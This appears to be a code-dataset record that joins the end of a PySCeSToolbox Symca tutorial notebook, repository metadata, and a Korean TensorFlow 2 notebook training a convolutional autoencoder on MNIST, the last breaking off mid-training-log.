processes. Can either be `\"multiproc\"` or `\"ipcluster\"`. A discussion of the differences between these methods are beyond the scope of this document, see [here](http://www.davekuhlman.org/python_multiprocessing_01.html) for a brief overview of Multiprocessing in Python. (*default*: `\"multiproc\"`).\n* `force_legacy`: If `True` `do_par_scan` will use a older and slower algorithm for performing the parameter scan. This is mostly used for debugging purposes. (*default*: `False`)\n\n\nBelow we will perform a percentage scan of $V_{f4}$ for 200 points between 0.01 and 1000 in log space:", "_____no_output_____" ] ], [ [ "percentage_scan_data = sc.cc_results.ccJR1_R4.do_par_scan(parameter='Vf_4',\n scan_range=numpy.logspace(-1,3,200),\n scan_type='percentage')", "MaxMode 1\n0 min 0 sec\nSCANNER: Tsteps 200\n\nSCANNER: 200 states analysed\n\n(hybrd) The solution converged.\n" ] ], [ [ "As previously described, these data can be displayed using `ScanFig` by calling the `plot` method of `percentage_scan_data`. Furthermore, lines can be enabled/disabled using the `toggle_category` method of `ScanFig` or by clicking on the appropriate buttons:", "_____no_output_____" ] ], [ [ "percentage_scan_plot = percentage_scan_data.plot()\n\n# set the x-axis to a log scale\npercentage_scan_plot.ax.semilogx()\n\n# enable all the lines\npercentage_scan_plot.toggle_category('Control Patterns', True)\npercentage_scan_plot.toggle_category('CP001', True)\npercentage_scan_plot.toggle_category('CP002', True)\n\n# display the plot\npercentage_scan_plot.interact()\n#remove_next", "_____no_output_____" ], [ "# To avoid duplication - do not run #ex\ndisplay(Image(path.join(notebook_dir,'images','sc_perscan.png'))) #ex", "_____no_output_____" ] ], [ [ "A `value` plot can similarly be generated and displayed. In this case, however, an additional line indicating $C^{J}_{4}$ will also be present:", "_____no_output_____" ] ], [ [ "value_scan_data = sc.cc_results.ccJR1_R4.do_par_scan(parameter='Vf_4',\n scan_range=numpy.logspace(-1,3,200),\n scan_type='value')\n\nvalue_scan_plot = value_scan_data.plot()\n\n# set the x-axis to a log scale\nvalue_scan_plot.ax.semilogx()\n\n# enable all the lines\nvalue_scan_plot.toggle_category('Control Coefficients', True)\nvalue_scan_plot.toggle_category('ccJR1_R4', True)\n\nvalue_scan_plot.toggle_category('Control Patterns', True)\nvalue_scan_plot.toggle_category('CP001', True)\nvalue_scan_plot.toggle_category('CP002', True)\n\n# display the plot\nvalue_scan_plot.interact()\n#remove_next", "_____no_output_____" ], [ "# To avoid duplication - do not run #ex\ndisplay(Image(path.join(notebook_dir,'images','sc_valscan.png'))) #ex", "_____no_output_____" ] ], [ [ "### Fixed internal metabolites\n\nIn the case where the concentration of an internal intermediate is fixed (such as in the case of a GSDA) the `internal_fixed` argument must be set to `True` in either the `do_symca` method, or when instantiating the `Symca` object. This will typically result in the creation of a `cc_results_N` object for each separate reaction block, where `N` is a number starting at 0. Results can then be accessed via these objects as with normal free internal intermediate models.\n\nThus for a variant of the `lin4_fb` model where the intermediate`S3` is fixed at its steady-state value the procedure is as follows:", "_____no_output_____" ] ], [ [ "# Create a variant of mod with 'C' fixed at its steady-state value\nmod_fixed_S3 = psctb.modeltools.fix_metabolite_ss(mod, 'S3')\n\n# Instantiate Symca object the 'internal_fixed' argument set to 'True'\nsc_fixed_S3 = psctb.Symca(mod_fixed_S3,internal_fixed=True)\n\n# Run the 'do_symca' method (internal_fixed can also be set to 'True' here)\nsc_fixed_S3.do_symca() ", "(hybrd) The solution converged.\n\nI hope we have a filebuffer\nSeems like it\n\nReaction stoichiometry and rate equations\n\nSpecies initial values\n\nParameters\nAssuming extension is .psc\nUsing model directory: /home/jr/Pysces/psc\nUsing file: lin4_fb_S3.psc\n/home/jr/Pysces/psc/orca/lin4_fb_S3.psc loading ..... \nParsing file: /home/jr/Pysces/psc/orca/lin4_fb_S3.psc\nInfo: \"X4\" has been initialised but does not occur in a rate equation\n \nCalculating L matrix . . . . . . . done.\nCalculating K matrix . . . . . . . done.\n \n(hybrd) The solution converged.\nSimplifying matrix with 24 elements\n************************\n" ] ], [ [ "The normal `sc_fixed_S3.cc_results` object is still generated, but will be invalid for the fixed model. Each additional `cc_results_N` contains control coefficient expressions that have the same common denominator and corresponds to a specific reaction block. These `cc_results_N` objects are numbered arbitrarily, but consistantly accross different sessions. Each results object accessed and utilised in the same way as the normal `cc_results` object. \n\nFor the `mod_fixed_c` model two additional results objects (`cc_results_0` and `cc_results_1`) are generated:\n\n\n\n* `cc_results_1` contains the control coefficients describing the sensitivity of flux and concentrations within the supply block of `S3` towards reactions within the supply block. ", "_____no_output_____" ] ], [ [ "sc_fixed_S3.cc_results_1", "_____no_output_____" ] ], [ [ "* `cc_results_0` contains the control coefficients describing the sensitivity of flux and concentrations of either reaction block towards reactions in the other reaction block (i.e., all control coefficients here should be zero). Due to the fact that the `S3` demand block consists of a single reaction, this object also contains the control coefficient of `R4` on `J_R4`, which is equal to one. This results object is useful confirming that the results were generated as expected. ", "_____no_output_____" ] ], [ [ "sc_fixed_S3.cc_results_0", "_____no_output_____" ] ], [ [ "If the demand block of `S3` in this pathway consisted of multiple reactions, rather than a single reaction, there would have been an additional `cc_results_N` object containing the control coefficients of that reaction block. ", "_____no_output_____" ], [ "### Saving results\n\nIn addition to being able to save parameter scan results (as previously described), a summary of the control coefficient and control pattern results can be saved using the `save_results` method. This saves a `csv` file (by default) to disk to any specified location. If no location is specified, a file named `cc_summary_N` is saved to the `~/Pysces/$modelname/symca/` directory, where `N` is a number starting at 0:\n", "_____no_output_____" ] ], [ [ "sc.save_results()", "_____no_output_____" ] ], [ [ "`save_results` has the following optional arguments:\n\n* `file_name`: Specifies a path to save the results to. If `None`, the path defaults as described above.\n* `separator`: The separator between fields (*default*: `\",\"`)", "_____no_output_____" ], [ "The contents of the saved data file is as follows:", "_____no_output_____" ] ], [ [ "# the following code requires `pandas` to run\nimport pandas as pd\n# load csv file at default path\nresults_path = '~/Pysces/lin4_fb/symca/cc_summary_0.csv'\n\n# Correct path depending on platform - necessary for platform independent scripts\nif platform == 'win32' and pysces.version.current_version_tuple() < (0,9,8):\n results_path = psctb.utils.misc.unix_to_windows_path(results_path)\nelse:\n results_path = path.expanduser(results_path)\n\nsaved_results = pd.read_csv(results_path)\n# show first 20 lines\nsaved_results.head(n=20) ", "_____no_output_____" ] ], [ [ "### Saving/loading sessions\n\nSaving and loading `Symca` sessions is very simple and works similar to `RateChar`. Saving a session takes place with the `save_session` method, whereas the `load_session` method loads the saved expressions. As with the `save_results` method and most other saving and loading functionality, if no `file_name` argument is provided, files will be saved to the default directory (see also [Basic Usage](basic_usage.ipynb#saving-and-default-directories)). As previously described, expressions can also automatically be loaded/saved by `do_symca` by using the `auto_save_load` argument which saves and loads using the default path. Models with internal fixed metabolites are handled automatically.", "_____no_output_____" ] ], [ [ "# saving session\nsc.save_session()\n\n# create new Symca object and load saved results\nnew_sc = psctb.Symca(mod)\nnew_sc.load_session()\n\n# display saved results\nnew_sc.cc_results", "(hybrd) The solution converged.\n" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1fb76ec0e3ced15bdbdb0af030574e89a6855b
389,728
ipynb
Jupyter Notebook
AutoEncoder_Conv(TensorFlow_2).ipynb
bluesky0960/AI_Study
5df0f4b7d125d504a06c390974aea872f42e34b3
[ "MIT" ]
null
null
null
AutoEncoder_Conv(TensorFlow_2).ipynb
bluesky0960/AI_Study
5df0f4b7d125d504a06c390974aea872f42e34b3
[ "MIT" ]
null
null
null
AutoEncoder_Conv(TensorFlow_2).ipynb
bluesky0960/AI_Study
5df0f4b7d125d504a06c390974aea872f42e34b3
[ "MIT" ]
null
null
null
125.1535
84,686
0.831719
[ [ [ "<a href=\"https://colab.research.google.com/github/bluesky0960/AI_Study/blob/master/AutoEncoder_Conv(TensorFlow_2).ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "# 오토인코더 (TensorFlow 2)\n텐서플로우 2에서 제공하는 고수준 API인 케라스를 이용해, 오토인코더(autoencoder)를 구현한다.\n* Google Colab 환경에서 사용하는 경우에 초점을 맞춤.\n* 텐서플로우 2\n* 텐서플로우 2 내장 케라스 기준\n\n참고문헌\n* [TensorFlow 소개](https://www.tensorflow.org/learn)\n* [TensorFlow > 학습 > TensorFlow Core > 가이드 > 케라스: 빠르게 훑어보기](https://www.tensorflow.org/guide/keras/overview)\n* [Deep Learning with Python, by Francois Chollet](https://github.com/fchollet/deep-learning-with-python-notebooks)\n\n\n주의사항\n* Colab에서 코드에 이상이 없음에도 불구하고 결과가 제대로 나오지 않을 경우, '런타임 다시 시작...'을 해보도록 한다.'\n\n\n## Deep Neural Network 기초\n다음 비디오를 보고 심층신경망(deep neural network) 기반 딥러닝 기법은 이해하도록 한다.\n* [신경망이란 무엇인가? | 1장.딥러닝에 관하여 (3Blue1Brown)](https://youtu.be/aircAruvnKk)\n* [경사 하강, 신경 네트워크가 학습하는 방법 | 심층 학습, 2장 (3Blue1Brown)](https://youtu.be/IHZwWFHWa-w)\n* [What is backpropagation really doing? | Deep learning, chapter 3 (3Blue1Brown)](https://youtu.be/Ilg3gGewQ5U)\n* [Backpropagation calculus | Deep learning, chapter 4 (3Blue1Brown)](https://youtu.be/tIeHLnjs5U8)\n\n\n## Tensorflow 2과 Keras를 사용하기 위한 구성\n```\nimport tensorflow as tf # 텐서플로우 임포트\nfrom tensorflow.keras import models, layers # 케라스 관련 모듈 임포트\nimport numpy as np\n\nprint(tf.__version__) # 텐서플로우 버전을 확인하도록 한다.\nprint(tf.keras.__version__) # 케라스 버전을 확인한다.\n```", "_____no_output_____" ] ], [ [ "import tensorflow as tf # 텐서플로우 임포트\nfrom tensorflow.keras import models, layers # 케라스 관련 모듈 임포트\nimport numpy as np\nimport matplotlib.pyplot as plt\n \nprint(tf.__version__) # 텐서플로우 버전을 확인하도록 한다.\nprint(tf.keras.__version__) # 케라스 버전을 확인한다.", "2.2.0-rc3\n2.3.0-tf\n" ] ], [ [ "## MNIST 데이터셋 띄우기\n* mnist 데이터셋은 LeCun이 만든 숫자(digit) 손글씨 데이터셋이다.\n* 60,000개의 트레이닝 데이터와 10,000개의 테스트 데이터로 이루어져 있다.\n\n\n### MNIST 이미지 데이터\n* 트레이닝 이미지와 테스트 이미지에 들어 있는 영상은 3차원 텐서이다.\n + 트레이닝 이미지의 경우, shape = (60000, 28, 28)\n + 테스트 이미지의 경우, shape=(10000, 28, 28)\n* 3차원 텐서는 다음의 의미로 구성되어 있음을 유념하자.\n + (# of images, image Height, image Width) 혹은 (# of images, # of Rows, # of Columns) \n* 각 이미지를 Conv2D Layer에 넣기 위해 reshape 함수를 통해 축을 하나 추가해준다.\n + 트레이닝 이미지의 경우, shape = (60000, 28, 28, 1)\n + 테스트 이미지의 경우, shape = (10000, 28, 28, 1)\n* 각 영상은 28 x 28 크기로 구성되어 있다.\n* 각 픽셀은 [0, 255] 사이의 uint8형 값이다.\n + 반드시, 텐서플로우에 입력으로 넣을 때, 픽셀값을 [0, 1] 사이의 float64형 값으로 변환하도록 하자.\n\n\n### MNIST 라벨 데이터\n* 각 라벨은 [0, 9] 사이의 unit8형 값이다.", "_____no_output_____" ] ], [ [ "# MNIST 데이터 로딩\nmnist = tf.keras.datasets.mnist\n\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\n\nprint('train_images의 *원래* 데이터의 shape과 dype:', \n train_images.shape, train_images.dtype)\nprint('test_images의 *원래* 데이터의 shape과 dype:', \n test_images.shape, test_images.dtype)\n\n# Conv2d layer를 위해 축 추가\ntrain_images = np.reshape(train_images, (len(train_images),28, 28, 1))\ntest_images = np.reshape(test_images, (len(test_images),28, 28, 1))\n\n# Normalizing the images to the range of [0., 1.]\ntrain_images = tf.cast(train_images, tf.float32)\ntest_images = tf.cast(test_images, tf.float32)\ntrain_images /= 255\ntest_images /= 255\n\nprint('train_images의 *바뀐* 데이터의 shape과 dype:', \n train_images.shape, train_images.dtype)\nprint('test_images의 *바뀐* 데이터의 shape과 dype:', \n test_images.shape, test_images.dtype)\n\n\n# Print out for checking\nprint(train_images[0].shape)\nprint(train_images[0][0][0].dtype)\nprint(train_labels.dtype)", "Downloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/mnist.npz\n11493376/11490434 [==============================] - 0s 0us/step\ntrain_images의 *원래* 데이터의 shape과 dype: (60000, 28, 28) uint8\ntest_images의 *원래* 데이터의 shape과 dype: (10000, 28, 28) uint8\ntrain_images의 *바뀐* 데이터의 shape과 dype: (60000, 28, 28, 1) <dtype: 'float32'>\ntest_images의 *바뀐* 데이터의 shape과 dype: (10000, 28, 28, 1) <dtype: 'float32'>\n(28, 28, 1)\n<dtype: 'float32'>\nuint8\n" ] ], [ [ "## 네트워크 모델 설계\n* 인코더 모델: 케라스 시퀀셜 모델로 설계\n + InputLayer로 (28,28) 영상을 받고, 출력으로 n_dim차원 벡터가 나오도록 함.\n* 디코더 모델: 케라스 시퀀셜 모델로 설계\n + InputLayer에서 n_dim차원 벡터를 받고, 출력으로 (28,28) 영상이 나오도록 함.\n* 오토인코더 모델: 인코더, 디코더를 결합하여 설계\n + 주의: InputLayer를 추가해야 곧장 함수로서 활용할 수 있음.", "_____no_output_____" ], [ "여기서는 n_dim을 우선 2로 설정한다.\n* 즉, n_dim=2", "_____no_output_____" ] ], [ [ "n_dim = 2", "_____no_output_____" ] ], [ [ "인코더 모델 정의\n* (28, 28, 1) 영상을 입력으로 받는 필터가 8개이고, kernel_size가 (2,2)인 Conv2d Layer를 정의한다(padding은 입력과 출력의 크기가 같도록 하기 위해 same을 넣어주었다)\n* Conv2D layer를 통과한 영상 크기를 maxpooling2d layer를 통과시켜 반으로 줄여줍니다.\n* 이것을 두번 반복해줍니다\n + conv2d: (28,28,1) -> (28,28,8)\n + maxpooling2d: (28,28,8) -> (14,14,8)\n + conv2d: (14,14,8) -> (14,14,8)\n + maxpooling2d: (14,14,8) -> (7,7,8)\n* Flatten으로 입력 텐서를 392-vector로 벡터라이즈((7,7,8) -> 7 x 7 x 8 = 392)\n* Fully connected layer로 392 > 128 > 64 > n_dim 로 차원 축소", "_____no_output_____" ] ], [ [ "enc = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same', input_shape=(28,28,1)),\n tf.keras.layers.MaxPooling2D((2,2), padding='same'),\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),\n tf.keras.layers.MaxPooling2D((2,2), padding='same'),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(64, activation='relu'),\n tf.keras.layers.Dense(n_dim)\n])", "_____no_output_____" ] ], [ [ "디코더 모델 정의\n* Fully connected layey로 n_dim > 64 > 128 > 392로 차원 확대\n* 392-vector를 Reshape을 통해 (7,7,8)의 텐서로 변환\n* 필터가 8이고 kernel_size가 (2,2)인 conv2d layer를 통과시킨다.\n* UpSampling2d를 통과시켜 conv2d layer를 통과한 영상의 크기를 2배로 늘려준다(이것을 2번 반복 시행)\n + conv2d: (7,7,8) -> (7,7,8)\n + upsampling2d: (7,7,8) -> (14,14,8)\n + conv2d: (14,14,8) -> (14,14,8)\n + upsampling2d: (14,14,8) -> (28,28,8)\n* 마지막으로 필터의 개수가 1이고 activation function이 sigmoid인 conv2d layer를 통과 시킨다.\n + conv2d: (28,28,8) -> (28,28,1)", "_____no_output_____" ] ], [ [ "dec = tf.keras.models.Sequential([\n tf.keras.layers.InputLayer(input_shape=(n_dim,)), # 주의: 반드시 1D tensor를 (ndim, )로 표현할 것\n tf.keras.layers.Dense(64, activation='relu'),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(392, activation='relu'),\n tf.keras.layers.Reshape(target_shape=(7,7,8)),\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),\n tf.keras.layers.UpSampling2D((2,2)),\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),\n tf.keras.layers.UpSampling2D((2,2)),\n tf.keras.layers.Conv2D(1, (2,2), activation='sigmoid', padding='same'),\n])", "_____no_output_____" ] ], [ [ "AutoEncoder 모델 정의\n* 인코더 > 디코더로 구성", "_____no_output_____" ] ], [ [ "ae = tf.keras.models.Sequential([\n enc,\n dec, \n])", "_____no_output_____" ] ], [ [ "## 훈련 전, 네트워크 모델을 함수로서 활용\n* AutoEncoder ae를 모델로 구성했기 때문에, 지금부터 함수로서 활용 가능 [(효과적인 TensorFlow: 세션 대신 함수)](https://www.tensorflow.org/guide/effective_tf2?hl=ko#%EC%84%B8%EC%85%98_%EB%8C%80%EC%8B%A0_%ED%95%A8%EC%88%98)\n + 단, ae 함수는 batch 단위로 수행됨을 명심할 것. \n - 단순히, (28, 28, 1) -> ae -> (28, 28, 1)로 동작하지 않고,\n - batch 단위로 (?, 28, 28, 1) -> ae -> (?, 28, 28, 1)로 병렬처리됨.\n* 지금은 훈련 전 네트웍이기 때문에 정상적으로 작동하지 않음.", "_____no_output_____" ] ], [ [ "y_pred = ae(train_images)\nprint('input shape:', train_images.shape)\nprint('output shape:', y_pred.shape)", "input shape: (60000, 28, 28, 1)\noutput shape: (60000, 28, 28, 1)\n" ] ], [ [ "train_images[idx] 영상에 대한 결과 확인\n* ae의 입력 / 출력 가시화\n", "_____no_output_____" ] ], [ [ "import ipywidgets as widgets\n\ndef io_imshow(idx):\n print('GT label:', train_labels[idx])\n plt.subplot(121)\n plt.imshow(train_images[idx,:,:,0])\n plt.subplot(122)\n plt.imshow(y_pred[idx,:,:,0])\n plt.show()\n\nwidgets.interact(io_imshow, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1, continuous_update=False));", "_____no_output_____" ] ], [ [ "## 네트워크 모델 구조 확인\n* summary() 함수로 모델의 구조를 텍스트로 프린트할 수 있음.\n* plot_model() 함수로 모델의 구조를 텍스트로 프린트할 수 있음.", "_____no_output_____" ] ], [ [ "enc.summary()\ntf.keras.utils.plot_model(enc, 'enc.png', show_shapes=True)", "Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nconv2d (Conv2D) (None, 28, 28, 8) 40 \n_________________________________________________________________\nmax_pooling2d (MaxPooling2D) (None, 14, 14, 8) 0 \n_________________________________________________________________\nconv2d_1 (Conv2D) (None, 14, 14, 8) 264 \n_________________________________________________________________\nmax_pooling2d_1 (MaxPooling2 (None, 7, 7, 8) 0 \n_________________________________________________________________\nflatten (Flatten) (None, 392) 0 \n_________________________________________________________________\ndense (Dense) (None, 128) 50304 \n_________________________________________________________________\ndense_1 (Dense) (None, 64) 8256 \n_________________________________________________________________\ndense_2 (Dense) (None, 2) 130 \n=================================================================\nTotal params: 58,994\nTrainable params: 58,994\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "dec.summary()\ntf.keras.utils.plot_model(dec, 'dec.png', show_shapes=True)", "Model: \"sequential_1\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\ndense_3 (Dense) (None, 64) 192 \n_________________________________________________________________\ndense_4 (Dense) (None, 128) 8320 \n_________________________________________________________________\ndense_5 (Dense) (None, 392) 50568 \n_________________________________________________________________\nreshape (Reshape) (None, 7, 7, 8) 0 \n_________________________________________________________________\nconv2d_2 (Conv2D) (None, 7, 7, 8) 264 \n_________________________________________________________________\nup_sampling2d (UpSampling2D) (None, 14, 14, 8) 0 \n_________________________________________________________________\nconv2d_3 (Conv2D) (None, 14, 14, 8) 264 \n_________________________________________________________________\nup_sampling2d_1 (UpSampling2 (None, 28, 28, 8) 0 \n_________________________________________________________________\nconv2d_4 (Conv2D) (None, 28, 28, 1) 33 \n=================================================================\nTotal params: 59,641\nTrainable params: 59,641\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "ae.summary()\ntf.keras.utils.plot_model(ae, 'ae.png', show_shapes=True)", "Model: \"sequential_2\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nsequential (Sequential) (None, 2) 58994 \n_________________________________________________________________\nsequential_1 (Sequential) (None, 28, 28, 1) 59641 \n=================================================================\nTotal params: 118,635\nTrainable params: 118,635\nNon-trainable params: 0\n_________________________________________________________________\n" ] ], [ [ "## 오토인코더 인스턴스 트레이닝\n\nAutoEncoder 인스턴스 ae에 대한 훈련 수행\n* 인스턴스 ae를 [compile](https://www.tensorflow.org/api_docs/python/tf/keras/Model#compile)\n + cf) shader program 컴파일과 유사하게 이해해도 됨\n + 이때, 훈련에 활용될 [optimizer](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers), [loss](https://www.tensorflow.org/api_docs/python/tf/keras/losses), [metrics](https://www.tensorflow.org/api_docs/python/tf/keras/metrics) 등을 지정함\n + Optmizer에 대한 이론적 내용은 [이곳](https://brunch.co.kr/@chris-song/50)을 참고하세요.\n* 훈련 데이터 쌍 (train_images, train_labels)으로 fit()을 이용해 훈련 ", "_____no_output_____" ] ], [ [ "ae.compile(optimizer='Adam', # optimizer의 name 혹은 함수 객체 설정\n loss='mse', \n metrics=['mae'])\n\nae.fit(train_images, train_images, epochs=10, batch_size=32)", "Epoch 1/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0593 - mae: 0.1298\nEpoch 2/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0464 - mae: 0.1062\nEpoch 3/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0437 - mae: 0.1012\nEpoch 4/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0424 - mae: 0.0988\nEpoch 5/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0414 - mae: 0.0969\nEpoch 6/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0407 - mae: 0.0956\nEpoch 7/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0402 - mae: 0.0946\nEpoch 8/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0397 - mae: 0.0937\nEpoch 9/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0393 - mae: 0.0930\nEpoch 10/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0390 - mae: 0.0924\n" ] ], [ [ "트레이닝 이후 ae 함수를 다시 수행", "_____no_output_____" ] ], [ [ "y_pred = ae(train_images)", "_____no_output_____" ], [ "import ipywidgets as widgets\n\ndef io_imshow(idx):\n print('GT label:', train_labels[idx])\n plt.subplot(121)\n plt.imshow(train_images[idx,:,:,0])\n plt.subplot(122)\n plt.imshow(y_pred[idx,:,:,0])\n plt.show()\n\nwidgets.interact(io_imshow, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1, continuous_update=False));", "_____no_output_____" ] ], [ [ "## 인코더 / 디코더 모델을 각각 따로 함수로서 활용하기\n다음과 같은 방법으로 트레이닝이 끝난 오토인코더의 enc와 dec를 각각 수행할 수 있다.", "_____no_output_____" ], [ "", "_____no_output_____" ] ], [ [ "z = enc(train_images)\ny_pred = dec(z)", "_____no_output_____" ] ], [ [ "## 인코딩 결과 확인 및 디코딩 결과 확인\n* 특정 이미지에 대한 인코딩 결과를 확인한다.\n* 인코딩 결과와 유사한 좌표값을 디코딩에 보내도 유사한 결과가 나옴을 확인한다.", "_____no_output_____" ] ], [ [ "import ipywidgets as widgets\n\ndef z_show(idx):\n print(z[idx])\n print('GT label:', train_labels[idx])\n\nwidgets.interact(z_show, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1));", "_____no_output_____" ] ], [ [ "인코딩 결과와 유사한 좌표값을 디코딩에 보내도 유사한 결과가 나옴을 확인", "_____no_output_____" ] ], [ [ "import ipywidgets as widgets\n\nu=widgets.FloatSlider(min=-5.0, max=5.0)\nv=widgets.FloatSlider(min=-5.0, max=5.0)\n\nui = widgets.HBox([u,v])\n\ndef z_test(u, v):\n z_test = np.array([[u,v]]) \n print(z_test)\n\n img_gen = dec(z_test)\n plt.imshow(img_gen[0,:,:,0])\n plt.show() \n\nout = widgets.interactive_output(z_test, {'u': u, 'v': v})\n\ndisplay(ui, out)", "_____no_output_____" ] ], [ [ "## 인코딩 결과 가시화\n오토인코더의 encoder가 만들어 내는 representation인 z 값을 가시화 한다. ", "_____no_output_____" ] ], [ [ "# 로딩된 MNIST 데이터 가시화\nimport matplotlib.pyplot as plt\n\nz_list = []\nz_list[:] = []\n\nfor i in range(0,10):\n print(\"z_{} :\".format(i), z[train_labels==i].shape)\n z_list.append(z[train_labels == i])\n\ncolors = ['red', 'green', 'blue', 'orange', 'purple', 'brown', 'pink', 'gray', 'olive', 'cyan']\n\nfor z, color in zip(z_list, colors):\n plt.scatter(z[:,0], z[:,1], color = color)\n", "_____no_output_____" ] ], [ [ "## 인코딩 결과 가시화를 통해 알 수 있는 점\n오토인코더의 encoder가 만들어 내는 representation인 z 값을 가시화를 해본 결과 label별로 discriminative한 representation을 만들어내지 못하는 것을 알 수 있다.", "_____no_output_____" ], [ "## 디코더를 이용한 Generative Model 구성", "_____no_output_____" ] ], [ [ "z = np.array([[-1, 0.2], \n [0.5, 0.5], \n [5, -5]\n ])\n\nresult = dec(z)\n\nprint(z.shape)\nprint(result.shape)", "(3, 2)\n(3, 28, 28, 1)\n" ] ], [ [ "결과 가시화\n + [-1, 0.2]는 숫자 8의 분포에 속한다.\n + [0.5, 0.5]는 숫자 6의 분포에 속한다.\n + [5, -5]는 숫자 0의 분포에 속한다.\n* 하지만, 8을 보면 5와 8의 애매한 경계선에 있는 것 같다.\n* 이를 통해, 분포가 겹치는 것을 확인할 수 있다.\n* 이 때문에 condition을 주어 분포가 겹치지 않게 하는 conditional autoencoder가 나오게 되었다.", "_____no_output_____" ] ], [ [ "# 로딩된 MNIST 데이터 가시화\nimport matplotlib.pyplot as plt\n\nplt.subplot(131)\nplt.imshow(result[0,:,:,0])\nplt.subplot(132)\nplt.imshow(result[1,:,:,0])\nplt.subplot(133)\nplt.imshow(result[2,:,:,0])", "_____no_output_____" ] ], [ [ "## 차원 늘리기\nn_dim을 2에서 7로 늘려본다.", "_____no_output_____" ] ], [ [ "n_dim = 7", "_____no_output_____" ] ], [ [ "## 인코딩 모델 정의", "_____no_output_____" ] ], [ [ "enc = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same', input_shape=(28,28,1)),\n tf.keras.layers.MaxPooling2D((2,2), padding='same'),\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),\n tf.keras.layers.MaxPooling2D((2,2), padding='same'),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(64, activation='relu'),\n tf.keras.layers.Dense(n_dim)\n])", "_____no_output_____" ] ], [ [ "## 디코딩 모델 정의", "_____no_output_____" ] ], [ [ "dec = tf.keras.models.Sequential([\n tf.keras.layers.InputLayer(input_shape=(n_dim,)), # 주의: 반드시 1D tensor를 (ndim, )로 표현할 것\n tf.keras.layers.Dense(64, activation='relu'),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(392, activation='relu'),\n tf.keras.layers.Reshape(target_shape=(7,7,8)),\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),\n tf.keras.layers.UpSampling2D((2,2)),\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),\n tf.keras.layers.UpSampling2D((2,2)),\n tf.keras.layers.Conv2D(1, (2,2), activation='sigmoid', padding='same'),\n])", "_____no_output_____" ] ], [ [ "## AutoEncoder 정의", "_____no_output_____" ] ], [ [ "ae = tf.keras.models.Sequential([\n enc,\n dec, \n])", "_____no_output_____" ] ], [ [ "## 네트워크 학습", "_____no_output_____" ] ], [ [ "ae.compile(optimizer='Adam', # optimizer의 name 혹은 함수 객체 설정\n loss='mse', \n metrics=['mae'])\n\nae.fit(train_images, train_images, epochs=10, batch_size=32)", "Epoch 1/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0443 - mae: 0.1027\nEpoch 2/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0264 - mae: 0.0672\nEpoch 3/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0238 - mae: 0.0620\nEpoch 4/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0225 - mae: 0.0592\nEpoch 5/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0216 - mae: 0.0575\nEpoch 6/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0210 - mae: 0.0562\nEpoch 7/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0206 - mae: 0.0552\nEpoch 8/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0202 - 